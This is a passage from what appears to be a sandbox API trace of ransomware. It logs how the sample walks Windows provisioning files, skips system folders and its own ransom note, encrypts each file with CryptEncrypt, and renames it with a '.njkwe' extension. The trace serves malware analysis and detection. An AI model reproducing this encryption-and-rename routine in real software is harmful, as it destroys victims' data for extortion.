(Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.807] lstrcmpiW (lpString1="26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.807] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml") returned 155 [0077.807] StrStrIW (lpFirst="26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.807] lstrcmpW (lpString1="26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.807] lstrcmpW (lpString1="26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.807] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\26__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.807] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\26__connections_cellular_a1 (austria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.807] GetTickCount () returned 0x1153c88 [0077.807] GetTickCount () returned 0x1153c88 [0077.807] GetTickCount () returned 0x1153c88 [0077.807] GetTickCount () returned 0x1153c88 [0077.807] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.808] GetProcessHeap () returned 0xbe0000 [0077.808] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.808] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x33b, lpOverlapped=0x0) returned 1 [0077.812] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.812] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x33b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x33b, lpOverlapped=0x0) returned 1 [0077.812] GetProcessHeap () returned 0xbe0000 [0077.812] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.812] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.812] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.812] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.812] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.812] CloseHandle (hObject=0x43c) returned 1 [0077.813] GetProcessHeap () returned 0xbe0000 [0077.813] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.813] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 175 [0077.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\26__connections_cellular_a1 (austria)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\26__connections_cellular_a1 (austria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.813] GetProcessHeap () returned 0xbe0000 [0077.813] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.813] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a07ce9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a07ce9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a07ce9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x317, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml", cAlternateFileName="270__C~1.PRO")) returned 1 [0077.813] lstrcmpiW (lpString1="270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.813] lstrcmpiW (lpString1="270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.813] lstrcmpiW (lpString1="270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.813] lstrcmpiW (lpString1="270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.813] lstrcmpiW (lpString1="270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.813] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml") returned 163 [0077.813] StrStrIW (lpFirst="270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.813] lstrcmpW (lpString1="270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.813] lstrcmpW (lpString1="270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.813] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\270__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.814] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\270__connections_cellular_telefonica (mexico)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.814] GetTickCount () returned 0x1153c98 [0077.814] GetTickCount () returned 0x1153c98 [0077.814] GetTickCount () returned 0x1153c98 [0077.814] GetTickCount () returned 0x1153c98 [0077.814] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.814] GetProcessHeap () returned 0xbe0000 [0077.814] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.814] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x317, lpOverlapped=0x0) returned 1 [0077.829] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffce9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.829] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x317, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x317, lpOverlapped=0x0) returned 1 [0077.830] GetProcessHeap () returned 0xbe0000 [0077.830] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.830] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.830] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.830] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.830] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.830] CloseHandle (hObject=0x43c) returned 1 [0077.830] GetProcessHeap () returned 0xbe0000 [0077.830] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.830] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\270__connections_cellular_telefonica (mexico)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\270__Connections_Cellular_Telefonica (Mexico)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\270__connections_cellular_telefonica (mexico)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.831] GetProcessHeap () returned 0xbe0000 [0077.831] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.831] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a2df51, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a2df51, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a2df51, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x389, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml", cAlternateFileName="271__C~1.PRO")) returned 1 [0077.833] lstrcmpiW (lpString1="271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.833] lstrcmpiW (lpString1="271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.833] lstrcmpiW (lpString1="271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.833] lstrcmpiW (lpString1="271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.833] lstrcmpiW (lpString1="271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.833] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml") returned 164 [0077.834] StrStrIW (lpFirst="271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.834] lstrcmpW (lpString1="271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.834] lstrcmpW (lpString1="271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.834] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\271__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.834] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\271__connections_cellular_telenor (montenegro)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.834] GetTickCount () returned 0x1153ca8 [0077.834] GetTickCount () returned 0x1153ca8 [0077.834] GetTickCount () returned 0x1153ca8 [0077.834] GetTickCount () returned 0x1153ca8 [0077.834] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.834] GetProcessHeap () returned 0xbe0000 [0077.834] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.834] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x389, lpOverlapped=0x0) returned 1 [0077.836] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.836] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x389, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x389, lpOverlapped=0x0) returned 1 [0077.836] GetProcessHeap () returned 0xbe0000 [0077.836] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.836] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.836] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.836] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.836] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.836] CloseHandle (hObject=0x43c) returned 1 [0077.836] GetProcessHeap () returned 0xbe0000 [0077.836] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.836] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0077.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\271__connections_cellular_telenor (montenegro)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\271__Connections_Cellular_Telenor (Montenegro)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\271__connections_cellular_telenor (montenegro)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.837] GetProcessHeap () returned 0xbe0000 [0077.837] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.837] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a2df51, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a2df51, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a2df51, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml", cAlternateFileName="272__C~1.PRO")) returned 1 [0077.837] lstrcmpiW (lpString1="272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.837] lstrcmpiW (lpString1="272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.837] lstrcmpiW (lpString1="272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.837] lstrcmpiW (lpString1="272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.837] lstrcmpiW (lpString1="272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.837] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml") returned 165 [0077.837] StrStrIW (lpFirst="272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.837] lstrcmpW (lpString1="272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.837] lstrcmpW (lpString1="272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.837] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\272__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.838] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\272__connections_cellular_t-mobile (montenegro)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.838] GetTickCount () returned 0x1153ca8 [0077.838] GetTickCount () returned 0x1153ca8 [0077.838] GetTickCount () returned 0x1153ca8 [0077.838] GetTickCount () returned 0x1153ca8 [0077.838] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.838] GetProcessHeap () returned 0xbe0000 [0077.838] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.838] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x307, lpOverlapped=0x0) returned 1 [0077.839] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.840] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x307, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x307, lpOverlapped=0x0) returned 1 [0077.840] GetProcessHeap () returned 0xbe0000 [0077.840] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.840] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.840] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.840] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.840] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.840] CloseHandle (hObject=0x43c) returned 1 [0077.840] GetProcessHeap () returned 0xbe0000 [0077.840] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.840] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\272__connections_cellular_t-mobile (montenegro)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\272__Connections_Cellular_T-Mobile (Montenegro)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\272__connections_cellular_t-mobile (montenegro)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 